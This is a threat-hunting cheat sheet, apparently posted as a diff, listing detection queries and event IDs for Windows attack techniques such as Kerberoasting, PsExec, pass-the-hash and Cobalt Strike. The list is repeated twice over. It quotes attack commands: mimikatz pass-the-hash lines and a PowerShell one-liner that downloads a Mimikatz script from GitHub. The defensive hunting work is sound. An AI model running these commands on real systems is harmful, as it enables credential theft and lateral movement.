0xAnalyst · May 7, 2025 09:59
diff --git a/Threat Hunting b/Threat Hunting
 1- T1174 -  Password Filter - Catch malicious password filters event log
 index=wineventlog EventID=4614
 AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW") 
 Reference 
 https://twitter.com/xknow_infosec/status/1178747476976820228
 2- T1113 - Screen capture
     look for nircmd executions
     powershell execution with screenshot in arguments
 3- T1074 - Data Staged
   enable object auditing files and folder - EventID 4663 - look for copying of different files in a short time span. Use bro 
   and Yara to look for suspicious files copies over SMB in the network
   https://twitter.com/CyberRaiju/status/1176025535761141761
 4- T1087 - Account Discovery
    Sysmon Execution consective execution of net commands
 5- T1171 - LLMNR/NBT-NS Poisoning and Relay 
    look for servicecreation with binary path in appdata/localtemp/temp and image path like winexecsvc.exe/psexecsvc.exe
    Event ID 4697
    Filter Service File Name: 
    5-1 detect renamed psexec
          Description Execute Files remotely 
          Product Sysinternals PSexec
          https://twitter.com/cyb3rops/status/1130747925242482688
        Second Detection
          4624 logon type 2 the process name called c:\\windows\psexecsvc.exe
 	  Detection based on 5145 - PSexec
 	  [EventID=5145 and TargetFileName contains *-stdin or *-stdout or *-stderr]
          [EventID=5145 and not TargetFileName contains *psexecsvc*) and TargetFileName contains *-stdin or *-stdout or *-stderr] -> means attacker changed default psexec service name. 
          https://threatexpress.com/blogs/2018/threat-mitigation-strategies-technical-recommendations-and-info-part-2/
 6- Hunt for .URL/.ini - Powershell Script to enumerate the network with this Yara rule
     https://twitter.com/Hexacorn/status/1176185705585926144
 7- Detect Kerberos password change without Lsass.exe
 [network where destination_port == 464 and process_name != "lsass.exe"].
 8- Detect UAC Bypass wsreset.exe
 Parent_name is wsresent.exe sysmon/EDR
 9- Kerberos ticket theft via Mimikatz/WCE
     (Mimikatz)Look for .kirbi files on endpoints, (WCE)file creations of wce_krbtkts and wce_ccache. Yara search https://github.com/gentilkiwi/mimikatz/blob/master/kiwi_passwords.yar#L45
 10- Detect Kerbroasting
     Event ID 4769, Ticket Options: 0x40810000, Ticket Encryption: 0x17
     Need to filter out service accounts (Account Name) & computers (Service Name)
     https://twitter.com/mgreen27/status/1178531676491640832
     https://www.trustedsec.com/2018/05/art_of_kerberoast/
     **Log Source**: Windows Security Event Log (Domain Controllers)  
     **Event ID**: 4769  
     **Status**: 0x0 (Audit Success)  
     **Ticket Encryption**: 0x17 (RC4)  
     **Service Name**: NOT krbtgt or NOT a system account (account name ends in $)  
     **TargetUserName**: NOT a system account (*$@*)  
     https://twitter.com/machosec/status/1011664801074905088
     https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/EventLogs/Kerbroasting.yaml
     AD Attribute - MS-SupportedEncryptions types https://www.youtube.com/watch?v=yrMGRhyoyGs
 11- CobaltStrike Beacon Hunting
          JA3/JA3S hashes
          Digital certificate sha256
          CobaltStrike's SMB Beacon are "status_(numbers)" and "msagent_(numbers)"
          Sysmon EventID 17 and EventID 18 starting with "msagent_*". 
          https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
 12-Hunting for service creation
          7045/4697 - %%COMSPEC%% OR cmd.exe OR powershell.exe OR Long Strings.
          4697 --
                 Service Name: PSEXESVC
 	           Service File Name:	%SystemRoot%\PSEXESVC.exe

          Service installed - System - System Security extension - Audit policy
          https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
          https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
 	  https://cyberwardog.blogspot.com/2017/04/
         https://medium.com/@bromiley/digging-into-sysinternals-psexec-64c783bace2b
   13- Hunting For susipicious Scheduled Tasks
        Event ID 4698 -      
 	<Command>
 	       cscript.exe wscript.exe rundll32.exe regsvr32.exe wmic.exe cmd.exe mshta.exe powershell.exe
 	https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
   14 - Detecting Pass the ticket - Windows
          https://jblog.javelin-networks.com/blog/detecting-pass-ticket-pass-hash-attack-using-simple-wmi-commands/
 		1. Win32_LoggedOnUser – To query all the active Users on the target host (Username, associated session IDs).
 		2. Win32_LogonSessions – To query all the active logon sessions on the target host (Session IDs).
 		3. Correlate between the username, the session ID and execute the KLIST command to each unique session, to determine all the associated Kerberos Tickets of these sessions.
 		4. Once we find a Kerberos ticket that doesn’t belong to his session owner, it means that someone has injected it to his session, clear indication for Pass-The-Ticket Attack
    
    15 - Detecting Pass the Hash  - Windows
    	 sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:”powershell -w hidden”
 	 mimikatz # sekurlsa::pth /user:  /domain: /ntlm: /run:"Downloads\PSTools\psexec \\hostname cmd.exe"
         https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
 	 4624- Logon Type 9
 	 Get-winevent -FilterHashtable @{logname='security'; id=4624; starttime=(get-date).AddHours(-1)} | where {$_.properties[8].value -eq 9}
    	 https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
    16 - Threat Hunting COM Objects
    
    	 $o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));
 	 $o.Open("GET", "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1", $False); $o.Send(); Write-Host $o.responseText; 
 	 
    17- Hunting Metsploit and Empire and CobaltStrike
          Shodan:
 		SSL:"MetasploitSelfSignedCA"
 		http.favicon.hash:"-127886975"
     18- Hunt for process executed based on network logons
     		4624-4628- logon type 3 - same User_logon_ID and exclude Null IP addresses
 		https://www.youtube.com/watch?v=LBgBGWPJLKo&list=PLmgXfSDaY0Ubwv9Jk2aow1Pa-U8mxRdVv&index=3
 		The HELK/Kibana
 		https://twitter.com/cyb3rward0g/status/1161829320983240704?lang=en
     19- hunting for malicious LDAP on the client side
     		Use LDAP ETW provider - Microsoft-Windows-LDAP-Client- {099614A5-5DD7-4788-8BC9-E29F43DB28FC}
 		https://gist.github.com/guitarrapc/35a94b908bad677a7310
	1- T1174 - Password Filter - Catch malicious password filters event log
	index=wineventlog EventID=4614
	AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW")
	Reference
	https://twitter.com/xknow_infosec/status/1178747476976820228
	2- T1113 - Screen capture
	look for nircmd executions
	powershell execution with screenshot in arguments
	3- T1074 - Data Staged
	enable object auditing files and folder - EventID 4663 - look for copying of different files in a short time span. Use bro
	and Yara to look for suspicious files copies over SMB in the network
	https://twitter.com/CyberRaiju/status/1176025535761141761
	4- T1087 - Account Discovery
	Sysmon Execution consective execution of net commands
	5- T1171 - LLMNR/NBT-NS Poisoning and Relay
	look for servicecreation with binary path in appdata/localtemp/temp and image path like winexecsvc.exe/psexecsvc.exe
	Event ID 4697
	Filter Service File Name:
	5-1 detect renamed psexec
	Description Execute Files remotely
	Product Sysinternals PSexec
	https://twitter.com/cyb3rops/status/1130747925242482688
	Second Detection
	4624 logon type 2 the process name called c:\\windows\psexecsvc.exe
	Detection based on 5145 - PSexec
	[EventID=5145 and TargetFileName contains -stdin or -stdout or *-stderr]
	[EventID=5145 and not TargetFileName contains psexecsvc) and TargetFileName contains -stdin or -stdout or *-stderr] -> means attacker changed default psexec service name.
	https://threatexpress.com/blogs/2018/threat-mitigation-strategies-technical-recommendations-and-info-part-2/
	6- Hunt for .URL/.ini - Powershell Script to enumerate the network with this Yara rule
	https://twitter.com/Hexacorn/status/1176185705585926144
	7- Detect Kerberos password change without Lsass.exe
	[network where destination_port == 464 and process_name != "lsass.exe"].
	8- Detect UAC Bypass wsreset.exe
	Parent_name is wsresent.exe sysmon/EDR
	9- Kerberos ticket theft via Mimikatz/WCE
	(Mimikatz)Look for .kirbi files on endpoints, (WCE)file creations of wce_krbtkts and wce_ccache. Yara search https://github.com/gentilkiwi/mimikatz/blob/master/kiwi_passwords.yar#L45
	10- Detect Kerbroasting
	Event ID 4769, Ticket Options: 0x40810000, Ticket Encryption: 0x17
	Need to filter out service accounts (Account Name) & computers (Service Name)
	https://twitter.com/mgreen27/status/1178531676491640832
	https://www.trustedsec.com/2018/05/art_of_kerberoast/
	Log Source: Windows Security Event Log (Domain Controllers)
	Event ID: 4769
	Status: 0x0 (Audit Success)
	Ticket Encryption: 0x17 (RC4)
	Service Name: NOT krbtgt or NOT a system account (account name ends in $)
	TargetUserName: NOT a system account ($@)
	https://twitter.com/machosec/status/1011664801074905088
	https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/EventLogs/Kerbroasting.yaml
	AD Attribute - MS-SupportedEncryptions types https://www.youtube.com/watch?v=yrMGRhyoyGs
	11- CobaltStrike Beacon Hunting
	JA3/JA3S hashes
	Digital certificate sha256
	CobaltStrike's SMB Beacon are "status_(numbers)" and "msagent_(numbers)"
	Sysmon EventID 17 and EventID 18 starting with "msagent_*".
	https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
	12-Hunting for service creation
	7045/4697 - %%COMSPEC%% OR cmd.exe OR powershell.exe OR Long Strings.
	4697 --
	Service Name: PSEXESVC
	Service File Name: %SystemRoot%\PSEXESVC.exe

	Service installed - System - System Security extension - Audit policy
	https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
	https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
	https://cyberwardog.blogspot.com/2017/04/
	https://medium.com/@bromiley/digging-into-sysinternals-psexec-64c783bace2b
	13- Hunting For susipicious Scheduled Tasks
	Event ID 4698 -
	<Command>
	cscript.exe wscript.exe rundll32.exe regsvr32.exe wmic.exe cmd.exe mshta.exe powershell.exe
	https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
	14 - Detecting Pass the ticket - Windows
	https://jblog.javelin-networks.com/blog/detecting-pass-ticket-pass-hash-attack-using-simple-wmi-commands/
	1. Win32_LoggedOnUser – To query all the active Users on the target host (Username, associated session IDs).
	2. Win32_LogonSessions – To query all the active logon sessions on the target host (Session IDs).
	3. Correlate between the username, the session ID and execute the KLIST command to each unique session, to determine all the associated Kerberos Tickets of these sessions.
	4. Once we find a Kerberos ticket that doesn’t belong to his session owner, it means that someone has injected it to his session, clear indication for Pass-The-Ticket Attack

	15 - Detecting Pass the Hash - Windows
	sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:”powershell -w hidden”
	mimikatz # sekurlsa::pth /user: /domain: /ntlm: /run:"Downloads\PSTools\psexec \\hostname cmd.exe"
	https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
	4624- Logon Type 9
	Get-winevent -FilterHashtable @{logname='security'; id=4624; starttime=(get-date).AddHours(-1)} \| where {$_.properties[8].value -eq 9}
	https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
	16 - Threat Hunting COM Objects

	$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));
	$o.Open("GET", "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1", $False); $o.Send(); Write-Host $o.responseText;

	17- Hunting Metsploit and Empire and CobaltStrike
	Shodan:
	SSL:"MetasploitSelfSignedCA"
	http.favicon.hash:"-127886975"
	18- Hunt for process executed based on network logons
	4624-4628- logon type 3 - same User_logon_ID and exclude Null IP addresses
	https://www.youtube.com/watch?v=LBgBGWPJLKo&list=PLmgXfSDaY0Ubwv9Jk2aow1Pa-U8mxRdVv&index=3
	The HELK/Kibana
	https://twitter.com/cyb3rward0g/status/1161829320983240704?lang=en
	19- hunting for malicious LDAP on the client side
	Use LDAP ETW provider - Microsoft-Windows-LDAP-Client- {099614A5-5DD7-4788-8BC9-E29F43DB28FC}
	https://gist.github.com/guitarrapc/35a94b908bad677a7310